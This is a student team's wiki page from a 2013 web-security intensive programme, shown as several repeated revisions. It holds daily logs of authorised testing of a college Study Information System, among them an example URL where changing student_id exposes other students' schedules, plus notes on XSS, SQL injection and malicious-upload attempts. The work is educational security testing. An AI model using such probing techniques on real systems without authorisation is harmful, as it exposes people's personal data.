** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''[[http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Final presentation (video)]]'''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-04T15:08:58Z

Saus: /* Results */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)'''

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-04T15:06:03Z

Saus: /* Results */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
